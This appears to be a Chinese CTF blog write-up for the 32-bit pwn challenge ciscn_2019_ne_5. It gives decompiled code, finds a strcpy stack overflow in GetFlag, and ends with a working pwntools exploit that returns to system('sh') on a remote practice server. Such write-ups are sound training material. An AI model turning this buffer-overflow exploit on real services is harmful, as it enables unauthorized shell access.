加载头像

ciscn_2019_ne_5

ubuntu18


0x01


checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/ciscn_2019_ne_5/ciscn_2019_ne_5'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x8048000)

运行之后直接得到了shell …

IDA

main()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
int __cdecl main(int argc, const char **argv, const char **envp)
{
int result; // eax
int v4; // [esp+0h] [ebp-100h] BYREF
char src[4]; // [esp+4h] [ebp-FCh] BYREF
char v6[124]; // [esp+8h] [ebp-F8h] BYREF
char s1[4]; // [esp+84h] [ebp-7Ch] BYREF
char v8[96]; // [esp+88h] [ebp-78h] BYREF
int *v9; // [esp+F4h] [ebp-Ch]

v9 = &argc;
setbuf(stdin, 0);
setbuf(stdout, 0);
setbuf(stderr, 0);
fflush(stdout);
*(_DWORD *)s1 = 48;
memset(v8, 0, sizeof(v8));
*(_DWORD *)src = 48;
memset(v6, 0, sizeof(v6));
puts("Welcome to use LFS.");
printf("Please input admin password:");
__isoc99_scanf("%100s", s1);
if ( strcmp(s1, "administrator") ) //输入administrator跳过exit()
{
puts("Password Error!");
exit(0);
}
puts("Welcome!");
puts("Input your operation:");
puts("1.Add a log.");
puts("2.Display all logs.");
puts("3.Print all logs.");
printf("0.Exit\n:");
__isoc99_scanf("%d", &v4);
switch ( v4 )
{
case 0:
exit(0);
return result;
case 1: //写入字符串
AddLog(src);
result = sub_804892B(argc, argv, envp);
break;
case 2: //无用
Display(src);
result = sub_804892B(argc, argv, envp);
break;
case 3: //无用
Print();
result = sub_804892B(argc, argv, envp);
break;
case 4:
GetFlag(src); //可疑函数
result = sub_804892B(argc, argv, envp);
break;
default:
result = sub_804892B(argc, argv, envp);
break;
}
return result;
}

Addlog()

1
2
3
4
5
int __cdecl AddLog(int a1)
{
printf("Please input new log info:");
return __isoc99_scanf("%128s", a1); //此处写入src
}

GetFlag()

1
2
3
4
5
6
7
8
9
10
int __cdecl GetFlag(char *src)
{
char dest[4]; // [esp+0h] [ebp-48h] BYREF
char v3[60]; // [esp+4h] [ebp-44h] BYREF

*(_DWORD *)dest = 48;
memset(v3, 0, sizeof(v3));
strcpy(dest, src); //可以利用src控制dest使溢出
return printf("The flag is your log:%s\n", dest);
}

0x02


思路

  1. 控制src (48H)
  2. strcpy(dest,src)处溢出至system() //0x80484D0

存在sh字符串

LOAD:080482E6 00000007 C fflush

080482E0 5F 75 73 65 64 00 66 66 6C 75 73 68 00 73 74 72 _used.fflush.str

取0x80482EA即可

s 0x48H
ebp 0x4
ret system()
system_ret 0xdeadbeef
arg sh

0x03


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *

io = remote('node4.buuoj.cn', 26736)

context(os='linux', arch='i386', log_level='debug')
io.sendlineafter(b'rd:', b'administrator')
io.sendlineafter(b'on:', b'1')
padding = 0x48 + 0x4
system = 0x80484D0
sh = 0x80482EA
payload = b'a' * padding + p32(system) + p32(0xdeadbeef) + p32(sh)
io.sendlineafter(b'fo:', payload)
io.sendline(b'4')
io.interactive()


评论
✅ 你无需删除空行,直接评论以获取最佳展示效果
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體